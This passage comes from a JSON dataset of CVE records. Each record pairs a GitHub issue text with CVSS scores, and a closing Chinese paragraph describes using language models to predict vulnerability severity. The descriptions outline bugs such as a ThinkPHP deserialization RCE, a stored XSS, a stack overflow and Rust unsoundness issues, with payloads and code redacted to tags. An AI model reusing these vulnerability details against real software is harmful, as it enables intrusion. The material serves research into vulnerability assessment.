  91285. "impactScore": 2.7,
  91286. "exploitabilityScore": 2.3
  91287. },
  91288. {
  91289. "CVE_ID": "CVE-2022-31306",
  91290. "Issue_Url_old": "https://github.com/nginx/njs/issues/481",
  91291. "Issue_Url_new": "https://github.com/nginx/njs/issues/481",
  91292. "Repo_new": "nginx/njs",
  91293. "Issue_Created_At": "2022-03-02T11:45:41Z",
  91294. "description": "SEGV APITAG in APITAG Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  91295. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91296. "severity": "MEDIUM",
  91297. "baseScore": 5.5,
  91298. "impactScore": 3.6,
  91299. "exploitabilityScore": 1.8
  91300. },
  91301. {
  91302. "CVE_ID": "CVE-2022-31620",
  91303. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/70",
  91304. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/70",
  91305. "Repo_new": "thorfdbg/libjpeg",
  91306. "Issue_Created_At": "2022-05-19T03:28:48Z",
  91307. "description": "Assert Failure in APITAG There is an assert failure in APITAG in APITAG . Depending on the usage of this library, e.g., running on remote server as a service, this could cause Deny of Service attack. reproduce steps NUMBERTAG unzip FILETAG NUMBERTAG compile libjpeg with address sanitizer enabled NUMBERTAG run APITAG poc FILETAG stack trace ERRORTAG",
  91308. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91309. "severity": "MEDIUM",
  91310. "baseScore": 6.5,
  91311. "impactScore": 3.6,
  91312. "exploitabilityScore": 2.8
  91313. },
  91314. {
  91315. "CVE_ID": "CVE-2022-32275",
  91316. "Issue_Url_old": "https://github.com/grafana/grafana/issues/50336",
  91317. "Issue_Url_new": "https://github.com/grafana/grafana/issues/50336",
  91318. "Repo_new": "grafana/grafana",
  91319. "Issue_Created_At": "2022-06-07T14:55:11Z",
  91320. "description": "Menus displayed even though user is not authenticated. If an authenticated user accesses the URL APITAG , he gets redirected to APITAG instead of begin redirected to login page. The various menus get displayed which is unexpected. Yet no data is being returned (and a temporary Unauthorized warning pops up). This leads to the following security assessment: FILETAG Hence this is not a security vulnerability. But as it is confusing for the end user it can be considered a UI bug.",
  91321. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  91322. "severity": "HIGH",
  91323. "baseScore": 7.5,
  91324. "impactScore": 3.6,
  91325. "exploitabilityScore": 3.9
  91326. },
  91327. {
  91328. "CVE_ID": "CVE-2022-32275",
  91329. "Issue_Url_old": "https://github.com/grafana/grafana/issues/50341",
  91330. "Issue_Url_new": "https://github.com/grafana/grafana/issues/50341",
  91331. "Repo_new": "grafana/grafana",
  91332. "Issue_Created_At": "2022-06-07T15:06:17Z",
  91333. "description": "Menu on left side displayed with ERRORTAG error page instead of login redirect. If an unauthenticated user accesses the URL APITAG he is displayed a generic ERRORTAG APITAG not found\" error with a menu on the left side instead of being redirected to the login page. Yet no data is being returned when interacting with the menu (and a temporary Unauthorized warning pops up). This leads to the following security assessment: FILETAG Hence this is not a security vulnerability. But as it is confusing for the end user it can be considered a UI bug.",
  91334. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  91335. "severity": "HIGH",
  91336. "baseScore": 7.5,
  91337. "impactScore": 3.6,
  91338. "exploitabilityScore": 3.9
  91339. },
  91340. {
  91341. "CVE_ID": "CVE-2022-32434",
  91342. "Issue_Url_old": "https://github.com/EIPStackGroup/OpENer/issues/374",
  91343. "Issue_Url_new": "https://github.com/eipstackgroup/opener/issues/374",
  91344. "Repo_new": "eipstackgroup/opener",
  91345. "Issue_Created_At": "2022-06-01T21:19:21Z",
  91346. "description": "A stackoverflow bug. Hi, there is a stack overflow bug in APITAG which is found by fuzzing. It can be reproduced by the FILETAG attached (by using APITAG script and FILETAG is assumed to be unziped). FILETAG Here is the message output by APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffa NUMBERTAG f NUMBERTAG at pc NUMBERTAG e bp NUMBERTAG fffa NUMBERTAG e NUMBERTAG sp NUMBERTAG fffa NUMBERTAG e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG fffa NUMBERTAG f NUMBERTAG thread T NUMBERTAG d ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG e8ab ( PATHTAG NUMBERTAG da0c ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d6b0 ( PATHTAG NUMBERTAG c5d7 ( PATHTAG NUMBERTAG eb ( PATHTAG NUMBERTAG b ( PATHTAG NUMBERTAG e NUMBERTAG e ( PATHTAG NUMBERTAG e0ed ( PATHTAG NUMBERTAG f NUMBERTAG e0b2 ( PATHTAG NUMBERTAG d ( PATHTAG ) Address NUMBERTAG fffa NUMBERTAG f NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG fcf ( PATHTAG ) This frame has NUMBERTAG object(s NUMBERTAG remaining_bytes NUMBERTAG incoming_message' APITAG NUMBERTAG beb NUMBERTAG f2]f2 f2 f2 f2 f2 f2 f NUMBERTAG f2 f2 f NUMBERTAG bec0: f2 f NUMBERTAG f NUMBERTAG f2 f2 f NUMBERTAG bed NUMBERTAG bee NUMBERTAG bef NUMBERTAG bf NUMBERTAG f3 f3 f3 f3 f3 f3 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  91347. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  91348. "severity": "HIGH",
  91349. "baseScore": 7.8,
  91350. "impactScore": 5.9,
  91351. "exploitabilityScore": 1.8
  91352. },
  91353. {
  91354. "CVE_ID": "CVE-2022-33070",
  91355. "Issue_Url_old": "https://github.com/protobuf-c/protobuf-c/issues/506",
  91356. "Issue_Url_new": "https://github.com/protobuf-c/protobuf-c/issues/506",
  91357. "Repo_new": "protobuf-c/protobuf-c",
  91358. "Issue_Created_At": "2022-04-29T15:41:58Z",
  91359. "description": "APITAG invalid left shift in protobuf c.c NUMBERTAG Describe the bug APITAG invalid left shift in protobuf c.c NUMBERTAG To Reproduce Built protobuf c using clang NUMBERTAG according to FILETAG with ERRORTAG commit: APITAG UBSAN Output ERRORTAG testcases that trigger the issue: FILETAG",
  91360. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  91361. "severity": "MEDIUM",
  91362. "baseScore": 5.5,
  91363. "impactScore": 3.6,
  91364. "exploitabilityScore": 1.8
  91365. },
  91366. {
  91367. "CVE_ID": "CVE-2022-33107",
  91368. "Issue_Url_old": "https://github.com/top-think/framework/issues/2717",
  91369. "Issue_Url_new": "https://github.com/top-think/framework/issues/2717",
  91370. "Repo_new": "top-think/framework",
  91371. "Issue_Created_At": "2022-05-24T07:16:25Z",
  91372. "description": "APITAG NUMBERTAG Unserialize RCE. APITAG RCE\u94fe\u5b50 Environment installation test APITAG Environment APITAG composer create project APITAG tp NUMBERTAG Add deserialization entry point ERRORTAG APITAG CODETAG access APITAG successfully RCE FILETAG exp ERRORTAG",
  91373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91374. "severity": "CRITICAL",
  91375. "baseScore": 9.8,
  91376. "impactScore": 5.9,
  91377. "exploitabilityScore": 3.9
  91378. },
  91379. {
  91380. "CVE_ID": "CVE-2022-33113",
  91381. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/39",
  91382. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/39",
  91383. "Repo_new": "jflyfox/jfinal_cms",
  91384. "Issue_Created_At": "2022-06-10T14:54:45Z",
  91385. "description": "XSS vulnerability stored in the publish blog module of Jfinal_cms NUMBERTAG There is a stored XSS vulnerability in APITAG 's publish blog module. An attacker can insert malicious XSS code into the keyword field. When the user views the content of the article in the foreground, the malicious XSS code is triggered successfully. payload: APITAG APITAG Successfully executed malicious XSS code: APITAG",
  91386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  91387. "severity": "MEDIUM",
  91388. "baseScore": 5.4,
  91389. "impactScore": 2.7,
  91390. "exploitabilityScore": 2.3
  91391. },
  91392. {
  91393. "CVE_ID": "CVE-2021-38192",
  91394. "Issue_Url_old": "https://github.com/tokio-rs/prost/issues/438",
  91395. "Issue_Url_new": "https://github.com/tokio-rs/prost/issues/438",
  91396. "Repo_new": "tokio-rs/prost",
  91397. "Issue_Created_At": "2021-02-13T20:37:52Z",
  91398. "description": "Conversion from APITAG to APITAG may panic. In prost types NUMBERTAG the conversion from Timestamp to APITAG uses the APITAG and APITAG operators on APITAG . This can overflow and panic URLTAG , creating a denial of service vulnerability if the input Timestamp is untrusted. Also, the conversion involves calling APITAG , which uses the APITAG and APITAG operators. This may panic or wrap around (depending on compiler settings), also creating a denial of service vulnerability if the application is compiled to panic on overflow. Proof of concept ERRORTAG Fixing APITAG should probably use APITAG . This can silently change the timestamp by up to about NUMBERTAG seconds if its nanos field is out of range, but such a timestamp is arguably invalid anyway, so that's probably okay. APITAG does not have APITAG methods, nor MIN and MAX constants. Therefore, unlike APITAG , there is no way to silently clamp the input timestamp to the valid range of APITAG s. That's probably a bad idea anyway, since APITAG could be based on a NUMBERTAG bit APITAG or Windows FILETIME , in which case clamping it could change the timestamp by much more than a mere few seconds. I recommend making the conversion fallible again and using APITAG .",
  91399. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  91400. "severity": "HIGH",
  91401. "baseScore": 7.5,
  91402. "impactScore": 3.6,
  91403. "exploitabilityScore": 3.9
  91404. },
  91405. {
  91406. "CVE_ID": "CVE-2021-38190",
  91407. "Issue_Url_old": "https://github.com/dimforge/nalgebra/issues/883",
  91408. "Issue_Url_new": "https://github.com/dimforge/nalgebra/issues/883",
  91409. "Repo_new": "dimforge/nalgebra",
  91410. "Issue_Created_At": "2021-04-29T15:00:09Z",
  91411. "description": "Deserialize is not sound for APITAG (and possibly others). APITAG currently looks like this: CODETAG APITAG carries an implicit invariant in that APITAG , and I believe there is some unsafe code that relies on this invariant. However, since Deserialize is derived, it does not know about this invariant. Therefore it is possible to break this invariant in safe code by deserializing invalid data. This is a potential security issue, since a malicious attacker might potentially use this to read/write to invalid memory locations. In order to fix this, we should write a custom Deserialize implementation that validates the input. There may also be other soundness issues caused by invariants not being upheld by derived Deserialize implementations throughout the library.",
  91412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91413. "severity": "CRITICAL",
  91414. "baseScore": 9.8,
  91415. "impactScore": 5.9,
  91416. "exploitabilityScore": 3.9
  91417. },
  91418. {
  91419. "CVE_ID": "CVE-2020-36203",
  91420. "Issue_Url_old": "https://github.com/diwic/reffers-rs/issues/7",
  91421. "Issue_Url_new": "https://github.com/diwic/reffers-rs/issues/7",
  91422. "Repo_new": "diwic/reffers-rs",
  91423. "Issue_Created_At": "2020-12-01T14:43:57Z",
  91424. "description": "Unsound: can make APITAG contain a APITAG APITAG object.. Hello \ud83e\udd80 , while scanning crates.io, we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue It is possible to make APITAG contain a non Send / non Sync object, since there is no APITAG bound on V in the APITAG function. APITAG Proof of Concept I wrote a short program that can trigger undefined behavior in safe Rust using this crate. Test environment OS: Windows crate version : APITAG compiled with APITAG program exhibits a segmentation fault when compiled and run in release mode. Error message from the program ERRORTAG ERRORTAG Thank you for checking out this issue \ud83e\udd80",
  91425. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  91426. "severity": "MEDIUM",
  91427. "baseScore": 4.7,
  91428. "impactScore": 3.6,
  91429. "exploitabilityScore": 1.0
  91430. },
  91431. {
  91432. "CVE_ID": "CVE-2020-36220",
  91433. "Issue_Url_old": "https://github.com/video-audio/va-ts/issues/4",
  91434. "Issue_Url_new": "https://github.com/video-audio/va-ts/issues/4",
  91435. "Repo_new": "video-audio/va-ts",
  91436. "Issue_Created_At": "2020-12-23T04:43:41Z",
  91437. "description": "Demuxer can carry non Send types across thread boundaries. Hello :crab: , we APITAG group APITAG gatech) found an undefined behavior issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Send is unconditionally implemented for Demuxer , so that it is possible for a non Send implementor of APITAG trait to be sent across thread boundaries. ERRORTAG Proof of Concept Here is a simple program where Demuxer is used to move a APITAG ( APITAG object) to another thread. It is also possible to create data races by inserting non Send types like Rc or Cell into Demuxer (which is not demonstrated in the example code below). ERRORTAG Suggested Fix Adding a trait bound APITAG as below will allow the compiler to prevent Demuxer from moving APITAG types across thread boundaries. ERRORTAG Thank you for reviewing this issue NUMBERTAG",
  91438. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  91439. "severity": "MEDIUM",
  91440. "baseScore": 5.9,
  91441. "impactScore": 3.6,
  91442. "exploitabilityScore": 2.2
  91443. },
  91444. {
  91445. "CVE_ID": "CVE-2020-35897",
  91446. "Issue_Url_old": "https://github.com/slide-rs/atom/issues/13",
  91447. "Issue_Url_new": "https://github.com/slide-rs/atom/issues/13",
  91448. "Repo_new": "slide-rs/atom",
  91449. "Issue_Created_At": "2020-09-21T18:15:03Z",
  91450. "description": "Create new cargo release to address safety issue. I noticed there's been a bunch of changes on master contributed by MENTIONTAG that haven't made their way out onto the cargo crate. Most importantly, the latest release NUMBERTAG is missing URLTAG which fixes a fairly important soundness issue around the Send trait's bounds. Without this commit, it's possible to Send across unsafe objects like Rc and potentially run into data races like so: ERRORTAG This could lead to use after frees and is a fairly easy mistake to make.",
  91451. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  91452. "severity": "MEDIUM",
  91453. "baseScore": 4.7,
  91454. "impactScore": 3.6,
  91455. "exploitabilityScore": 1.0
  91456. },
  91457. {
  91458. "CVE_ID": "CVE-2019-16140",
  91459. "Issue_Url_old": "https://github.com/sagebind/isahc/issues/2",
  91460. "Issue_Url_new": "https://github.com/sagebind/isahc/issues/2",
  91461. "Repo_new": "sagebind/isahc",
  91462. "Issue_Created_At": "2018-01-01T21:19:23Z",
  91463. "description": "impl APITAG for Vec APITAG is unsound. The returned vector is backed by freed memory, because slice is dropped at the end of the function.",
  91464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  91465. "severity": "CRITICAL",
  91466. "baseScore": 9.8,
  91467. "impactScore": 5.9,
  91468. "exploitabilityScore": 3.9
  91469. },
  91470. {
  91471. "CVE_ID": "CVE-2022-25852",
  91472. "Issue_Url_old": "https://github.com/brianc/node-libpq/issues/84",
  91473. "Issue_Url_new": "https://github.com/brianc/node-libpq/issues/84",
  91474. "Repo_new": "brianc/node-libpq",
  91475. "Issue_Created_At": "2022-06-22T17:19:09Z",
  91476. "description": "Mitigation for CVETAG . Hi there. It appears a vulnerability has been flagged for libpq: URLTAG I'm not sure what the fix is, but I wanted to get this filed, as I haven't found any issue mentioning it yet.",
  91477. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  91478. "severity": "HIGH",
  91479. "baseScore": 7.5,
  91480. "impactScore": 3.6,
  91481. "exploitabilityScore": 3.9
  91482. }
  91483. ]

在信息安全领域,漏洞评估和管理是关键任务之一。本作品探讨了如何利用预训练文本大模型来评估和研判漏洞的严重等级,具体基于通用漏洞评分系统。传统漏洞评分方法依赖于手动分析和专家评审。而基于自然语言处理文本大模型通过其深度学习能力,可以自动化地处理和分析大量的安全相关文本数据,从而提高漏洞评估的效率和准确性。结合词干提取、词性还原能够更好地发挥自然语言处理文本大模型的预测能力与准确度。